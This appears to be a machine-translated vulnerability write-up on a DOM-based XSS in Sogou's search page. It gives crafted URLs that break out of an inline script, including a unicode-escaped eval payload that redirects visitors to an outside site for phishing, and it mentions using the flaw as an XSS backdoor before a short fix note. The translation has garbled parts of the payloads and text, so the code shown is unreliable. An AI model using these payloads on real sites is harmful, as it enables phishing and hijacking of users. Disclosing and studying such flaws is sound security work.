Sogou main site domxss

A long time ago I found that I have been researching and trying to release it. It is also good for the manufacturer to fix it early. When I first discovered it, I could only use it to play a box, and I could not even write a jump. Go directly to the previous figure:
Http://www.sogou.com/quan? Query = % E6 % A2 % A7 % E6 % A1 % 90% E9 % 9B % A8 & qt = zhaopin % 22} % 0 aalert (1) // & sourceid = inttab_news all browsers, so there is no browser restriction. After the execution: wutongyu.jpg well, here is just a window, and it cannot even do anything. It is good to make a phishing jump. When I thought I could jump to directly replace alert (1) with eval (location. href = % 22 http://wutongyu.info % 22), I found it was truncated: http://www.sogou.com/quan? Query = % E6 % A2 % A7 % E6 % A1 % 90% E9 % 9B % A8 & qt = zhaopin % 22} % 0 aeval (location. href = % 22 http://wutongyu.info % 22) // & sourceid = inttab_news
And because the output here is between the <script>, so we put the eval () in the content of js turn can bypass: http://www.sogou.com/quan? Query = wutongyu & qt = zhaopin "} % 0a % 0a % 0 aeval (" \ Users \ u0063 \ u0061 \ u0074 \ u0069 \ u006f \ u006e \ u002e \ u0068 \ u0072 \ Users \ u0066 \ u003d \ u0027 \ u0068 \ u0074 \ u0074 \ u0070 \ u003a \ u002f \ u002f \ u0077 \ u0075 \ u0074 \ Users \ u0067 \ u0079 \ Users \ \ u0069 \ u006e \ u0066 \ u006f \ u0027 ") // & sourceid = inttab_news skip to my blog. The above is clear. Of course, there are also many ways to use the process, for example, as an xss BACKDOOR: Reference: http://www.80sec.com/%E6%B7%B1%E6%8E%98xss%E6%BC%8F%E6%B4%9E%E5%9C%BA%E6%99%AF%E4%B9%8Bxss-rootkit-%E4%BF% AE %E8% AE %A2.htmlSolution:Purification output: ', \, and),}, etc. There are about 86 lines of code.